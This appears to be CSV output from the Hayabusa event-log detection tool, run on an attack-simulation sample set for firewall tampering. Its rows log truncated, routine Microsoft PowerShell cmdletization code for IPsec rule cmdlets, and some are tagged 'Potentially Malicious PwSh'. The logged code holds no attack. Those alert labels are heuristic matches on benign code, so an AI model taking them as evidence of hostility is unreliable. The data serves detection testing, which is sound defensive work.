'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 
'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetA",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"[System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and 
(@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', 
$__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and 
(@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 
'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetA",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"ll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 
'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Servers')) { [object]$__cmdletization_value = ${Servers} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Servers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Servers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Domains')) { [object]$__cmdletization_value = ${Domains} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Domains'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Domains'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('EndpointType')) { [object]$__cmdletization_value = ${EndpointType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AddressType')) { [object]$__cmdletization_value = ${AddressType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AddressType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.AddressVersion'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AddressType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.AddressVersion'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Output'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = 
$__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DnsServers')) { [object]$__cmdletization_value = ${DnsServers} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DnsServers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DnsServers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('SyncPolicyDelta', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $false if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } 
Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Sync-NetIPsecRule' -Alias '*' function Update-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])] param( [Parameter(ParameterSetName='Query (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.ChangeAction] ${Action}, [Parameter(ParameterSetName='Query (cdxml)', ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', ValueFromPipelineByPropertyName=$true)] [string[]] ${IPv6Addresses}, [Parameter(ParameterSetName='Query (cdxml)', ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', ValueFromPipelineByPropertyName=$true)] [string[]] ${IPv4Addresses}, [Parameter(ParameterSetName='Query (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType] ${EndpointType}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] 
${PassThru}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.AddQueryOption('PolicyS",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"ll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Servers')) { [object]$__cmdletization_value = ${Servers} $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Servers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Servers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Domains')) { [object]$__cmdletization_value = ${Domains} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Domains'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Domains'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EndpointType')) { [object]$__cmdletization_value = ${EndpointType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 